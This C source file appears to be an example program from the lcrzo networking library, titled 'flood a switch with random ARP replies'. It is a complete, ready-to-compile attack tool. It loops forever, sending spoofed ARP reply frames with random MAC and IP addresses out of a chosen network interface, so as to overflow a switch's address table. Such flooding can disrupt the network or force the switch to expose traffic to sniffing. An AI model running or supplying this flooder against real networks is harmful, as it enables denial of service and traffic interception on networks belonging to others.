
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000215=
{ /*reference*/     "lcrzoex", 215,
  /*version*/       1, 0,
  /*title*/         "flood a switch with random ARP replies",
  /*french title*/  "floode un switch avec des reponses ARP aleatoires",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "device",
  /*french usage*/  "device",
  /*usage example*/ "eth0",
  /*fr. usage ex.*/ "eth0",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000215_main(int argc, char *argv[]);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000215_main(int argc, char *argv[])
{ lcrzo_spoof spoof;
  lcrzo_hdrleth hdrleth;
  lcrzo_hdrlarp hdrlarp;
  lcrzo_device device;
  int i, n;

  lcrzo_init();
  if ( argc<2 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000215, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* initialize device */
  lcrzo_epr(shared_para_device_init_src(argv[1], device));

  /* initialize Ethernet header */
  lcrzo_epr(lcrzo_hdrleth_initdefault(&hdrleth));
  hdrleth.type=LCRZO_HDRLETH_TYPE_ARP;

  /* initialize ARP header */
  lcrzo_epr(lcrzo_hdrlarp_initdefault(&hdrlarp));
  hdrlarp.op = 2;

  /* initialize spoof */
  lcrzo_epr(lcrzo_spoof_init(&spoof));
  lcrzo_epr(lcrzo_spoof_set_printbeforesending(&spoof, LCRZO_FALSE));

  /* main loop */
  n=0;
  while(1)
  { /* set false addresses */
    for ( i=0 ; i<LCRZO_ETHA_MAXBYTES ; i++ )
    { lcrzo_er(lcrzo_uint8_init_rand(1, 0xFE, &(hdrleth.src[i])));
    }
    for ( i=0 ; i<LCRZO_ETHA_MAXBYTES ; i++ )
    { lcrzo_er(lcrzo_uint8_init_rand(1, 0xFE, &(hdrleth.dst[i])));
    }
    memcpy(hdrlarp.hw_src, hdrleth.src, LCRZO_ETHA_MAXBYTES);
    for ( i=0 ; i<LCRZO_IPA_MAXBYTES ; i++ )
    { lcrzo_er(lcrzo_uint8_init_rand(1, 0xFE, &(hdrlarp.prot_src[i])));
    }
    memcpy(hdrlarp.hw_dst, hdrleth.dst, LCRZO_ETHA_MAXBYTES);
    for ( i=0 ; i<LCRZO_IPA_MAXBYTES ; i++ )
    { lcrzo_er(lcrzo_uint8_init_rand(1, 0xFE, &(hdrlarp.prot_dst[i])));
    }
    /* spoof */
    lcrzo_epr(lcrzo_spoof_etharp(&spoof, device, hdrleth, hdrlarp));
    /* print dots */
    if ( n++>100 ) {printf("."); fflush(stdout); n=0;}
  }

  lcrzo_epr(lcrzo_spoof_close(&spoof));

  lcrzo_close();
  return(LCRZO_ERR_OK);
}
